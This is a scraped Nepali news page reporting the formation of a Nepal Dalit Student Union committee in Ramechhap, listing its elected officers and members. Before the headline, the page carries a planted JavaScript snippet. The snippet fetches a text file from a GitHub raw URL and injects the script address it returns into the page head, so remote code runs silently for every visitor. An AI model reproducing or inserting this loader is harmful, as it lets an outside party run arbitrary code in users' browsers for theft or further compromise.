;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा नेपाल दलित विद्यार्थी संघ गठन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा नेपाल दलित विद्यार्थी संघ गठन
राजनीति

रामेछापमा नेपाल दलित विद्यार्थी संघ गठन

नेपाल दलित विद्यार्थी संघ रामेछापको अध्यक्षमा प्रकाश विक चयन भएका छन् । संघका केन्द्रीय अध्यक्ष राजु सुनारसहित जिल्लाका पार्टी नेताहरुको उपस्थितिमा भएको अधिवेशनले उपाध्यक्षमा सरोज परियार, सचिवमा शर्मीला विसन्के, सहसचिवमा लच्चित नेपाली, कोषाध्यक्षमा सविता वसेललाई चयन गरेको हो ।

यस्तै अधिवेशनले सदस्यहरुमा हेममाया नेपाली, विमला नेपाली, रोजिना तिरुवा, गीता कुमारी वसेल, अस्मिता नेपाली, लक्ष्मी नेपाली, बलराम विक, मनिता नेपाली, रविन गजमेर र सुकदेव विकलाई चयन गरेको संघका केन्द्रीय सदस्य सुवास बराइली (बुलबुल)ले जानकारी दिए ।

फेसबुक प्रतिक्रियाहरु